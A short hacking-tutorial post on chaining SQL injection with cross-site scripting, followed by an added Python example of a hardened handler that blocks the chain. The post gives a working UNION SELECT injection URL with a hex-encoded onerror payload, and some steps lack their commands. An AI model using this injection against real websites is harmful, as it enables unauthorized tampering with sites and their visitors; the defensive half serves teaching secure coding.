Hey Guys!
Today I am going to show you how to attack a website using XSS (Cross-Site Scripting) combined with SQLi.
This is pretty simple! We just have to inject our JavaScript code into the
website. I will not teach you the basics of SQLi here; you can find them in
my other tutorial.
Like this:
http://www.site.in/index.php?id=3
Step 2: Finding the number of columns on the site using ORDER BY method.
So our site has 6 columns!
Step 3: Finding the vulnerable column, using UNION SELECT method.
And the most vulnerable column is 3!
Step 4: Now we will inject our XSS payload into it. To keep things simple, we will encode our payload as hex.
Our XSS payload:
<img src=x onerror=confirm(/XSS/)>
Hex encoded payload:
0x3c696d67207372633d78206f6e6572726f723d636f6e6669726d282f5853532f293e
Step 5: Injecting the payload into our site ;)
http://site.com/index.php?id=-3' union select 1,2,0x3c696d67207372633d78206f6e6572726f723d636f6e6669726d282f5853532f293e,4,5--+
Good Bye, Video for this tutorial is coming soon on my Channel (Ahsan Tahir)
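The chain above only works when two flaws are present together: the id parameter is concatenated into the SQL query, and column 3 is written into the page without HTML encoding. The following is an added example, not code from the original post, of a handler that closes both; the table layout, the render_article function and the sample rows are assumptions constructed for illustration, and it uses Python with SQLite rather than the PHP site in the tutorial.

```python
import html
import re
import sqlite3

# The markup string from Step 4, used here only as constructed sample data.
MARKUP = "<img src=x onerror=confirm(/XSS/)>"


def make_db():
    """Constructed 6-column table; column 3 (title) is the one the page prints."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, author TEXT, "
               "title TEXT, body TEXT, tags TEXT, created TEXT)")
    db.executemany("INSERT INTO articles VALUES (?, ?, ?, ?, ?, ?)", [
        (3, "admin", "Welcome", "text", "news", "2016-01-01"),
        # A row that already holds markup, however it got into the database.
        (4, "guest", MARKUP, "text", "news", "2016-01-02"),
    ])
    return db


def render_article(db, raw_id):
    """Hypothetical hardened equivalent of index.php?id=... (assumed name)."""
    # 1. Allow-list the input: the id must be plain ASCII digits, nothing else.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return 400, "Bad request"
    # 2. Bind the value as a parameter so it can never become SQL syntax.
    row = db.execute("SELECT title FROM articles WHERE id = ?",
                     (int(raw_id),)).fetchone()
    if row is None:
        return 404, "Not found"
    # 3. Encode on output so database content is rendered as text, not HTML.
    return 200, "<h1>" + html.escape(row[0]) + "</h1>"


if __name__ == "__main__":
    db = make_db()
    for value in ("3", "-3' union select 1,2,3,4,5-- ", "4"):
        print(repr(value), "->", render_article(db, value))
```

Each control is enough to break this chain on its own, but both are needed: the bound parameter stops the UNION injection, and the output encoding covers markup that reaches the database some other way.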